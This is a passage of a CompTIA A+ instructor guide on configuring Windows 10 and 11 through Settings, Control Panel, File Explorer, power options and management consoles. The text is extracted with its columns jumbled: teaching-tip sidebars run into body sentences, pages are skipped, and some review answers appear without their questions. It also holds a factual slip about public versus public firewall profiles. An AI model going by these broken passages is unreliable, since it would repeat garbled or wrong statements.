interface. Students in determining customer preferences for one OS over another.
should be familiar
with basic Windows Windows 10 Desktop
operation (using
the Start menu and One of the main functions of an OS is to provide an interface (or shell) for the user
taskbar and managing to configure and operate the computer hardware and software. Windows has
desktop windows), several interface components designed both for general use and for more technical
but be prepared
to demonstrate
configuration and troubleshooting.
these procedures if
students have no prior
experience at all.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 335
The top level of the user interface is the desktop. This is displayed when Windows
starts, and the user logs on. The desktop contains the Start menu, taskbar, and
shortcut icons. These are all used to launch and switch between applications.
Windows 10 uses a touch-optimized Start menu interface. The Start menu is
activated by selecting the Start button or by pressing the START or Windows logo
key on the keyboard.
As well as the Start button, the taskbar contains the Instant Search box, Task View
button, and notification area. The notification area contains icons for background
processes. The middle part of the taskbar contains icons for apps that have an open
window. Some app icons can also be pinned to the taskbar. The taskbar icons are
used to switch between program windows.
It is worth learning the keyboard shortcuts to navigate the desktop and program
windows quickly. A complete list is published at support.microsoft.com/en-us/windows/
keyboard-shortcuts-in-windows-dcc61a57-8ff0-cffe-9796-cb9706c75eec.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
336 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Windows 11 Desktop
Teaching Windows 11 refreshes the desktop style by introducing a center-aligned taskbar,
Tip better spacing for touch control, and rounded corners. It also makes the multiple
Review the main UI desktops feature more accessible. Multiple desktops allow the user to set up
changes introduced different workspaces, such as one desktop that has windows for business apps
in Windows 11. Note open and another with windows and shortcuts for personal apps and games.
that the left alignment
of the taskbar can be
reapplied by adjusting
its properties.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 337
Home page in the Windows 10 Settings app showing the top-level configuration headings
or groups. (Screenshot courtesy of Microsoft.)
In Windows 11, the Settings app has no “home” page. Use the Menu icon to navigate
between the headings groups:
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
338 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Control Panel
Teaching Most of the standard Windows 10 and Windows 11 configuration settings can
Tip be located within Windows Settings, but not all of them. Some options are still
Explain that Control configured via the legacy Control Panel interface.
Panel is the legacy Each icon in the Control Panel represents an applet used for some configuration
interface. Each feature
update tends to move
tasks. Most applets are added by Windows, but some software applications, such as
more configuration antivirus software, add their own applets.
options from Control
Panel to Settings.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 339
Accounts Settings
A Windows account can either be configured as a local-only account or linked to
a Microsoft account. A local account can be used to sign-in on a single computer
only. A Microsoft account gives access to Microsoft’s cloud services and allows
sign-in and syncs desktop settings and user profile data across multiple devices.
The Accounts settings app is used for the following configuration tasks:
• Your info—Manage the current user account. If the account type is a Microsoft
account, this links to a web portal.
• Email & accounts—Add sign-in credentials for other accounts, such as email or
social networking, so that you can access them quickly.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
340 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Privacy Settings
Show Privacy settings govern what usage data Windows is permitted to collect and
Slide(s) what device functions are enabled and for which apps. There are multiple settings
Privacy Settings toggles to determine what data collection and app permissions are allowed:
• Data collection allows Microsoft to process usage telemetry. It affects use of
Teaching speech and input personalization, language settings, general diagnostics, and
Tip activity history.
Note that these
options are chosen • App permissions allow or deny access to devices such as the location service,
when the account is camera, and microphone and to user data such as contacts, calendar items,
created but can be email, and files.
reconfigured here.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 341
Desktop Settings
The desktop can be configured to use locale settings and personalized to adjust its Show
appearance. Slide(s)
Desktop Settings
Time & Language Settings
Teaching
The Time & Language settings pages are used for two main purposes:
Tip
• Set the correct date/time and time zone. Keeping the PC synchronized to an You shouldn’t need
accurate time source is important for processes such as authentication and to go into detail, but
backup. note the importance
of setting the date/
• Set region options for appropriate spelling and localization, keyboard input time correctly. Also
method, and speech recognition. Optionally, multiple languages can be explain the toggle
where multiple input
enabled. The active language is toggled using an icon in the notification area
methods have been
(or START+SPACE). configured.
Language settings. Note the ENG button in the taskbar. This can be used to switch between
input methods. (Screenshot courtesy of Microsoft.)
Personalization Settings
The Personalization settings allow you to select and customize themes, which set
the appearance of the desktop environment. Theme settings include the desktop
wallpaper, screen saver, color scheme, font size, and properties for the Start menu
and taskbar.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
342 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Ease of Access can be configured via Settings or via Control Panel. In Windows 11, these
settings are found under the Accessibility heading.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 343
File Explorer
File management is a critical part of using a computer. As a computer support Show
professional, you will often have to assist users with locating files. In Windows, file Slide(s)
management is performed using the File Explorer app. File Explorer enables you to File Explorer
open, copy, move, rename, view, and delete files and folders.
Teaching
File Explorer is often just referred to as "Explorer," as the process is run from the file Tip
explorer.exe.
File management isn’t
a content example,
but do make sure
students understand
the organizational
principles behind
File Explorer, such
as the local profile
folders, local drives
and folders, network
locations, and
integration with
OneDrive. Stress the
distinction between
system objects and
the underlying drives
and directories.
You might also want
to discuss roaming
profiles. Home folders
and folder redirection
are covered later in
the course.
System Objects
In Windows, access to data files is typically mediated by system objects. These are
shown in the left-hand navigation pane in File Explorer. Some of the main system
objects are:
• User account—Contains personal data folders belonging to the signed-in
account profile. For example, in the previous screenshot, the user account is
listed as “James at CompTIA.”
• OneDrive—If you sign into the computer with a Microsoft account, this shows
the files and folders saved to your cloud storage service on the Internet.
• This PC—Also contains the personal folders from the profile but also the fixed
disks and removable storage drives attached to the PC.
• Recycle Bin—Provides an option for recovering files and folders that have been
marked for deletion.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
344 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
System Files
System files are the files that are required for the operating system to function.
The root directory of a typical Windows installation normally contains the following
folders to separate system files from user data files:
• Windows—The system root, containing drivers, logs, add-in applications, system
and configuration files (notably the System32 subdirectory), fonts, and so on.
• Users—Storage for users’ profile settings and data. Each user has a folder
named after their user account. This subfolder contains NTUSER.DAT (registry
data) plus subfolders for personal data files. The profile folder also contains
hidden subfolders used to store application settings and customizations, favorite
links, shortcuts, and temporary files.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 345
General and view configuration settings in the File Explorer Options dialog.
(Screenshot courtesy of Microsoft.)
On the View tab, among many other options, you can configure the following
settings:
• Hide extensions for known file types—Windows files are identified by a three-
or four-character extension following the final period in the file name. The
file extension can be used to associate a file type with a software application.
Overtyping the file extension (when renaming a file) can make it difficult to open,
so extensions are normally hidden from view.
• Hidden files and folders—A file or folder can be marked as “Hidden” through
its file attributes. Files marked as hidden are not shown by default but can be
revealed by setting the “Show hidden files, folders, and drives” option.
• Hide protected operating system files—This configures files marked with the
System attribute as hidden. It is worth noting that in Windows, File/Resource
Protection prevents users (even administrative users) from deleting these files
anyway.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
346 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Indexing Options
You can configure file search behavior on the Search tab of the File Explorer
Options dialog. Search is also governed by settings configured in the Indexing
Options applet. This allows you to define indexed locations and rebuild the index.
Indexed locations can include both folders and email data stores. A corrupted index
is a common cause of search problems.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 347
Review Activity:
Windows User Settings
3
3. A user calls to say that he clicked Yes to a prompt to allow the browser to
access the computer’s location service while using a particular site and
is now worried about personal information being tracked by other sites.
How can the user adjust the app permission in Windows?
Via the App permissions section under Privacy settings. You might also note that
most browser software can be configured to only allow location information on a
per-site basis.
The user must first show file extensions, using the View tab in the File Explorer
Options applet (you might also note that this can be done via a check box on the
View menu ribbon of File Explorer).
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
348 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Topic 10B
Show
Slide(s)
Configure Windows System Settings
Configure Windows
5
System Settings
CORE 2 EXAM OBJECTIVES COVERED
Teaching 1.4 Given a scenario, use the appropriate Microsoft Windows 10 Control Panel utility.
Tip 1.5 Given a scenario, use the appropriate Windows settings.
This topic collects the
remaining content In this topic, you will use the Settings and Control Panel interfaces to configure
examples from
system, app, network, and device settings in Windows 10 and Windows 11.
objectives 1.4 and 1.5.
These settings are
focused on system/
device configuration
System Settings
rather than per-user The System Settings page in the Settings app presents options for configuring input
options.
and output devices, power, remote desktop, notifications, and clipboard (data copying).
Show There is also an About page listing key hardware and OS version information.
Slide(s)
System Settings
Teaching
Tip
There’s obviously a lot
of detail here that you
could go into, but bear
in mind the objectives
document just lists
“System” with no
further expansion. You
might want to revisit
some of the options if
you have time later in
the course.
You might want to
note that the “classic”
System applet is still
present despite the
best efforts of the
latest feature updates
(shell:::
{bb06c0e4-
d293-4f75-
8a90-cb05b64
77eee}).
About settings page in Windows 10. (Screenshot courtesy of Microsoft.)
The quick route to
advanced system
properties is The bottom of this page contains links to related settings. These shortcuts access
control configuration pages for the BitLocker disk encryption product, system protection,
sysdm.cpl
and advanced system settings. Advanced settings allow configuration of:
• Performance options to configure desktop visual effects for best appearance or
best performance, manually configure virtual memory (paging), and operation
mode. The computer can be set to favor performance of either foreground
or background processes. A desktop PC should always be left optimized for
foreground processes.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 349
Environment variables set various useful file paths. For example, the
%SYSTEMROOT% variable expands to the location of the Windows folder
(C:\Windows, by default).
In earlier versions of Windows, these options could also be managed via a System
applet in Control Panel, but use of this applet is now deprecated.
• Patch management is an important maintenance task to ensure that PCs operate Update and
Security Settings
reliably and securely. A patch or update is a file containing replacement system
or application code. The replacement file fixes some sort of coding problem Teaching
in the original file. The fix could be made to improve reliability, security, or Tip
performance.
Explain the
• Security apps detect and block threats to the computer system and data, such as importance of
checking that updates
viruses and other malware in files and unauthorized network traffic. are being applied.
Anti-malware and
Windows Update firewall will be covered
in more detail later,
Windows Update hosts critical updates and security patches plus optional software so do not spend too
and hardware device driver updates. much time here.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
350 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Update detection and scheduling can be configured via Settings > Update &
Security. Note that, in the basic interface, Windows Update can only be paused
temporarily and cannot be completely disabled. You can use the page to check for
updates manually and choose which optional updates to apply.
As well as patches, Windows Update can be used to select a Feature Update. This
type of update is released periodically and introduces changes to OS features and
tools. You can also perform an in-place upgrade from Windows 10 to Windows 11 if
the hardware platform is compatible.
The WindowsUpdate.txt log (stored in the %SystemRoot% folder) records update activity.
If an update fails to install, you should check the log to find the cause; the update will fail
with an error code that you can look up on the Microsoft Knowledge Base.
Windows Security
The Windows Security page contains shortcuts to the management pages for the
built-in Windows Defender virus/threat protection and firewall product.
Workstation security and the functions of antivirus software and firewalls are covered in
detail later in the course.
In Windows 11, Privacy & security settings are collected under the same heading and
Windows Update is a separate heading.
Activation
Microsoft Product Activation is an antipiracy technology that verifies that
software products are legitimately purchased. You must activate Windows within a
given number of days after installation. After the grace period, certain features will
be disabled until the system is activated over the Internet using a valid product key
or digital license.
The Activation page shows current status. You can input a different product key
here too.
Device Settings
Show Most Windows-compatible hardware devices use Plug and Play. This means that
Slide(s) Windows automatically detects when a new device is connected, locates drivers
Device Settings for it, and installs and configures it with minimal user input. In some cases, you
may need to install the hardware vendor’s driver before connecting the device. The
Teaching vendor usually provides a setup program to accomplish this. More typically, device
Tip drivers are supplied via Windows Update.
Device options are
scattered between When using a 64-bit edition of Windows, you must obtain 64-bit device drivers. 32-bit
several management drivers will not work.
tools and pages,
so help students
understand how to
navigate them. Several interfaces are used to perform hardware device configuration and
management:
• The System settings pages contain options for configuring Display and Sound
devices.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 351
• The Devices settings pages contain options for input devices (mice, keyboards,
and touch), print/scan devices, and adding and managing other peripherals
attached over Bluetooth or USB.
• The Devices and Printers applet in Control Panel provides an interface for
adding devices manually and shortcuts to the configuration pages for connected
devices.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
352 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Settings for output and input audio devices. (Screenshot courtesy of Microsoft.)
You can also use the icon in the Notification Area to control the volume.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 353
Power Options
Power management allows Windows to selectively reduce or turn off the power Show
supplied to hardware components. The computer can be configured to enter a Slide(s)
power-saving mode automatically; for example, if there is no use of an input device Power Options
for a set period. This is important to avoid wasting energy when the computer is on
but not being used and to maximize run-time when on battery power. The user can Teaching
also put the computer into a power-saving state rather than shutting down. Tip
The Advanced Configuration and Power Interface (ACPI) specification is designed Explain the different
to ensure software and hardware compatibility for different power-saving modes. power-saving
states, noting the
There are several levels of ACPI power mode, starting with S0 (powered on) and difference between
ending with S5 (soft power off) and G3 (mechanically powered off). In between full hibernation and
these are different kinds of power-saving modes: hybrid sleep plus
Modern Standby.
• Standby/Suspend to RAM—Cuts power to most devices (for example, the CPU,
monitor, disk drives, and peripherals) but maintains power to the memory. This
is also referred to as ACPI modes S1–S3.
In Windows, these ACPI modes are implemented as the sleep, hybrid sleep, and
modern standby modes:
• A laptop goes into the standby state as normal; if running on battery power, it
will switch from standby to hibernate before the battery runs down.
• A desktop creates a hibernation file and then goes into the standby state. This is
referred to as hybrid sleep mode. It can also be configured to switch to the full
hibernation state after a defined period.
You can also set sleep timers for an individual component, such as the display or
hard drive, so that it enters a power-saving state if it goes unused for a defined
period.
The Power & sleep settings provide an interface for configuring timers for turning
off the screen and putting the computer to sleep when no user activity is detected.
The Control Panel Power Options applet exposes additional configuration options.
One such option is defining what pressing the power button and/or closing the lid
of a laptop should perform (shut down, sleep, or hibernate, for instance).
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
354 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Configuring power settings via the Power Options applet in Control Panel.
(Screenshot courtesy of Microsoft.)
You can also use the Power Options applet to enable or disable fast startup. This
uses the hibernation file to instantly restore the previous system RAM contents and
make the computer ready for input more quickly than with the traditional hibernate
option.
If necessary, a more detailed power plan can be configured via Power Options.
A power plan enables the user to switch between different sets of preconfigured
options easily. Advanced power plan settings allow you to configure a very wide
range of options, including CPU states, search and indexing behavior, display
brightness, and so on. You can also enable Universal Serial Bus (USB) selective
suspend to turn off power to peripheral devices.
Teaching • Store apps are installed via the Microsoft Store. Store apps can be transferred
Tip between any Windows device where the user signs in with that Microsoft
Explain the differences account. Unlike desktop applications, store apps run in a restrictive sandbox.
between types of This sandbox is designed to prevent a store app from making system-wide
installable software, changes and prevent a faulty store app from “crashing” the whole OS or
and note the two interfering with other apps and applications. This extra level of protection
interfaces for
means that users with only standard permissions are allowed to install store
managing apps.
apps. Installing a store app does not require confirmation with UAC or computer
administrator-level privileges.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 355
• Desktop apps are installed by running a setup program or MSI installer. These
apps require administrator privileges to install.
• Windows Subsystem for Linux (WSL) allows the installation of a Linux distribution
and the use of Linux applications.
Apps Settings
In the Settings app, the Apps group is used to view and remove installed apps and Show
Windows Features. You can also configure which app should act as the default for Slide(s)
opening, editing, and printing particular file types and manage which apps run Apps Settings
at startup.
Teaching
Tip
Note that the Mail
applet is only present
if the Microsoft
Outlook mail client
is installed. User
accounts can be linked
to email profiles for
other apps using the
Accounts settings app.
Apps & features settings can be used to uninstall software apps, add/remove Windows features,
and set default apps. (Screenshot courtesy of Microsoft.)
To uninstall a program successfully, you should exit any applications or files that might
lock files installed by the application, or the PC will need to be restarted. You may also
need to disable antivirus software. If the uninstall program cannot remove locked files,
it will normally prompt you to check its log file for details (the files and directories can
then be deleted manually).
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
356 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Mail
The Mail applet in Control Panel is added if the Microsoft Outlook client
email application is installed to the computer. It can be used to add email
accounts/profiles and manage the .OST and .PST data files used to cache and
archive messages.
Mail applet configuration options for accounts and data files in the Microsoft Outlook email,
contact, and calendar client app. (Screenshot courtesy of Microsoft.)
Gaming
The Gaming settings page is used to toggle game mode on and off. Game
mode suspends Windows Update and dedicates resources to supporting the 3-D
performance and frame rate of the active game app rather than other software or
background services.
There are also options for managing captures, in-game chat/broadcast features,
and networking with an Xbox games console.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 357
Network Settings
A Windows host can be configured with one or more types of network adapter. Show
Adapter types include Ethernet, Wi-Fi, cellular radio, and virtual private network Slide(s)
(VPN). Each adapter must be configured with Internet Protocol (IP) address Network Settings
information. Each network that an adapter is used to connect to must be assigned
a trust profile, such as public, private, or domain. The network profile type Teaching
determines firewall settings. A public network is configured with more restrictive Tip
firewall policies than a public or domain network. Network adapter
configuration and
This network status and adapter information is managed via various configuration
sharing are covered
utilities: in detail elsewhere in
• Network & Internet is the modern settings app used to view network status, the course, so do not
spend too long here.
change the IP address properties of each adapter, and access other tools.
The Internet Options
• Network Connections (ncpa.cpl) is a Control Panel applet for managing dialog contains
adapter devices, including IP address information. a huge amount
of configuration
• Network and Sharing Center is a Control Panel applet that shows status complexity in terms
information. of zones and security
levels, but as IE is
• Advanced sharing settings is a Control Panel applet that configures network obsolete, it hardly
seems worth spending
discovery (allows detection of other hosts on the network) and enables or time on it. If students
disables file and printer sharing. are worried, possibly
revisit it when
Windows Defender Firewall discussing browser
security later in the
Windows Defender Firewall determines which processes, protocols, and hosts course.
are allowed to communicate with the local computer over the network. The
Windows Security settings app and the applet in Control Panel allow the firewall
to be enabled or disabled. Complex firewall rules can be applied via the Windows
Defender with Advanced Security management console.
Internet Options
The Internet Options Control Panel applet exposes the configuration settings for
Microsoft’s Internet Explorer (IE) browser. The Security tab is used to restrict what
types of potentially risky active content are allowed to run. However, IE is end of life.
You are only likely to have to use Internet Options and IE where there is an internal
website that has not been upgraded to work with a modern browser.
Show
Administrative Tools Slide(s)
Settings and most Control Panel applets provide interfaces for managing basic Administrative Tools
desktop, device, and app configuration parameters. One of the options in Control
Panel is the Administrative Tools shortcut. This links to a folder of shortcuts to Teaching
several advanced configuration consoles. Tip
This page previews the
tools we’ll be covering
in the next lesson, so
you don’t need to go
into the detail of each
utility. Just contrast the
use of management
consoles with the
simpler Settings app.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
358 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
A Microsoft Management Console (MMC) contains one or more snap-ins that are
used to modify advanced settings for a subsystem, such as disks or users. The
principal consoles available via Administrative Tools are:
• Computer Management (compmgmt.msc)—The default management console
with multiple snap-ins to schedule tasks and configure local users and groups,
disks, services, devices, and so on.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 359
More detail on each of these tools will be provided in the next lesson.
Management Shortcuts
To access the various administrative interfaces and management consoles quickly, Show
it is worth learning shortcut methods for opening them. Slide(s)
• Pressing START+X or right-clicking the Start button shows a shortcut menu Management
Shortcuts
with links to the main management utilities, such as Device Manager, Computer
Management, Command Prompt, and Windows PowerShell.
Teaching
Tip
This isn’t related to
a specific content
example (though
students do need
to know the .msc
file names for given
utilities), but make
students aware of
options and shortcuts
that can help them
to work more
productively.
Windows 10 WinX menu (right-click the Start button). (Screenshot courtesy of Microsoft.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
360 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Contents of the WinX menu do change periodically. For example, early feature
updates of Windows 10 have links to Control Panel and the legacy command prompt.
In Windows 11, links to Windows Terminal replace the PowerShell shortcuts.
• The Instant Search box on the Start menu will execute programs and
configuration options using simple names. Press the START key, and then
simply type the program file name or utility name. You can also open files or
unregistered programs by typing the path to the file.
• The Run dialog (START+R) can be used to execute a program with switches that
modify the operation of the software.
The Run dialog allows you to execute a command with switches. (Screenshot courtesy of Microsoft.)
• The shortcut menus for system objects and notification area icons contain links
to configuration tools. For example, the Properties item for This PC opens the
System settings app, while Manage opens the Computer Management console.
Individual Settings app pages can be accessed from the Run dialog using uniform
resource indicators such as ms-settings:system. Control Panel applets can
be opened using commands in the form control ncpa.cpl.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 361
Review Activity:
Windows System Settings
6
1. You are assisting a user over the phone and need to identify the edition Teaching
of Windows that is installed. What step instructions must you give for Tip
the user to report this information to you?
Take some time at
the end of each topic
Open the Settings app, and then select System. Select the About section, and read
to answer questions.
the text next to Edition under the Windows specifications heading. You can use the
review questions
2. While troubleshooting an issue with a graphics card in Windows 10, you for discussion in
discover that the driver version is not up to date. What first step could class or set them for
you perform to install the latest driver? students to complete
individually during or
In the Settings app, select Update & Security. Under Windows Update, select “View after class.
optional updates.” If a graphics driver update is not listed here, check the vendor’s
site for driver installation software.
Use the Sound settings app or Control Panel applet to check the volume setting and
that the headset is configured as the input and output device. If the headset is not
listed, check the USB or Bluetooth connection.
4. You are assisting a laptop user. While the user was away from their desk,
the laptop powered off. The user was in the middle of working on a file
and forgot to save changes. Can you reassure the user and advise on the
best course of action?
When a computer goes into a power-saving mode, it will either maintain a small
amount of power to the memory modules or write the contents of memory to a
hibernation file on disk. Consequently, the user should be able to start the laptop
again, and the desktop will resume with the open file still there. You should advise
the customer to save changes to files regularly, however.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
362 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Lesson 10
Summary
5
Show You should be able to use the Settings and Control Panel interfaces to configure
Slide(s) Windows for different business-, home-, and user-requirements scenarios.
Summary
Guidelines for Configuring Windows
Teaching
Document standard procedures and work instructions to make best use of
Tip
Windows Settings and Control Panel for different tasks:
Try to include some
time at the end • Verify OS configuration options, version information, and security via System and
of each lesson to Update & Security settings.
check students'
understanding and • Configure sign-in and desktop options via Accounts/User Accounts, Ease of
answer questions. Access, Time and Language, Personalization, and Privacy.
• Set up hardware via System, Devices, Sound, Devices and Printers, Device
Manager, and Power Options.
• Configure file browsing and search via File Explorer Options and Indexing
Options.
• Set up apps and Windows features via Apps, Mail, Gaming, and Programs and
Features.
• Configure networking via Network and Internet, Network and Sharing Center,
Windows Defender Firewall, and Internet Options.
Additional practice questions for the topics covered in this lesson are available on the
CompTIA Learning Center.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Lesson 11
Managing Windows
1
LESSON INTRODUCTION
Settings and Control Panel are focused on managing configuration settings for a Show
single computer. In an enterprise environment, configuration and monitoring of Slide(s)
hundreds or thousands of desktops require more advanced tools. For example, Objectives
very commonly, configuration can be achieved more quickly and reliably using
command-line tools. In this lesson, you will learn about the appropriate use of Teaching
advanced interfaces and tools to manage Windows 10 and Windows 11 systems. Tip
This lesson covers
the more advanced
Lesson Objectives system administration
consoles and tools
In this lesson, you will: plus use of the
command shell.
• Use management consoles.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
364 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Topic 11A
Use Management Consoles
2
Alternatively, driver updates might be supplied via Windows Update. They are typically
listed as optional updates.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 365
Using device properties to investigate driver and roll back to a previous version.
(Screenshot courtesy of Microsoft.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
366 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
There is also an option in Device Manager to Disable a device, which you might use
if it is not working with the current driver and you want to make it inaccessible to
users while you find a replacement. Devices that cannot be physically uninstalled
easily may also be disabled to improve system security. Disabled devices are shown
with a down arrow.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 367
The terminology of drives, volumes, and partitions can be confusing. Partitions are
configured on HDDs and SSDs. A volume is a logical storage unit made available to the
OS. There could be a simple 1:1 mapping between a partition and a volume. However,
a volume can also be created using a redundant drive configuration (RAID) where there
are actually multiple devices and partitions supporting the one volume. In Windows,
“drive” refers to a volume that has been mapped to a letter. However, drive is very
frequently used to mean a hardware storage device too.
One of the disks (typically Disk 0) will be the one holding the operating system. This
disk will have at least three volumes:
• The system volume contains the files used to boot the OS. This typically uses a
boot system called extensible firmware interface (EFI). It is not usually assigned a
drive letter.
• The boot volume contains the operating system files and is usually allocated the
drive letter C:.
The Disk Management console supports the following disk and partitioning tasks:
• Initializing disks—If you add an unformatted HDD, SSD, or thumb drive, you
will be prompted to initialize it. You can choose whether to use the master boot
record (MBR) or Globally Unique ID (GUID) Partition Table (GPT) partition style for
the new disk. MBR and GPT refer to the way the partition information is stored
on the disk.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
368 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
The smallest unit of storage on a fixed disk has traditionally been the 512-byte sector. A
file system is not restricted to using a single sector as the basic unit of storage, however.
The file system can group sectors into allocation units/clusters of 2, 4, or 8 sectors.
Smaller clusters make more efficient use of the disk capacity, but using larger clusters
can improve file input/output (I/O) performance, especially when working with large
files. As fixed disk sizes have increased, some disk models now use Advanced Format,
with 4 kilobyte (4K) sector sizes. If supported by the OS and PC firmware, these can
be used in native mode; if not, the drive controller will usually present the disk in 512
emulated (512e) mode.
You cannot format or delete system or boot partitions. During setup, the boot partition
must be formatted as NTFS, and the system partition must be formatted as FAT32.
• Configuring dynamic disks—If there is more than one disk available, a new
dynamic volume can be configured. Dynamic volumes use multiple devices to
implement some type of software RAID redundancy, such as mirroring.
The dynamic disks feature is deprecated. The Storage Spaces feature is now the
preferred method of configuring redundant disk configurations.
• Damage—Hard disk operations are physically intensive, and the platters of the
disk are easy to damage, especially if there is a power cut. If the disk does not
recognize that a sector is damaged, files can become corrupted. SSDs can suffer
from degradation of the memory circuitry, resulting in bad blocks, and can be
damaged by impacts, overheating, and electrical issues.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 369
These problems can be addressed by the systematic use of disk maintenance tools.
These tools should be run regularly—at least every month and before installing
software applications.
Disk Defragmenter
The Defragment and Optimize Drives tool (dfrgui.exe) runs various operations
to speed up the performance of HDDs and SSDs:
• On an HDD, defragmenting rewrites file data so that it occupies contiguous
clusters, reducing the amount of time the controller has to seek over the disk to
read a file.
• On an SSD, data is stored in units called blocks that are not directly managed
by the OS. The drive controller determines how blocks are used according to
wear-leveling routines to minimize degradation of the solid-state cells. The
main purpose of the optimizer tool is to instruct the controller to run a TRIM
operation. Essentially, TRIM is a process by which the controller identifies data
that the OS has marked as deletable and can then tag corresponding blocks as
writable. The optimizer does perform a type of defragmentation operation on an
SSD if it holds the OS and the system protection feature Volume Shadow Copy
service is enabled.
Windows automatically schedules the disk optimizer to run using Task Scheduler.
You should check for any issues, such as it not running successfully.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
370 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Disk Clean-up
The Disk Clean-up (cleanmgr.exe) tool tracks files that can be safely erased to
reclaim disk space. These files include ones deleted but still available in the Recycle
Bin and various temporary files and caches. The tool can be run in administrator
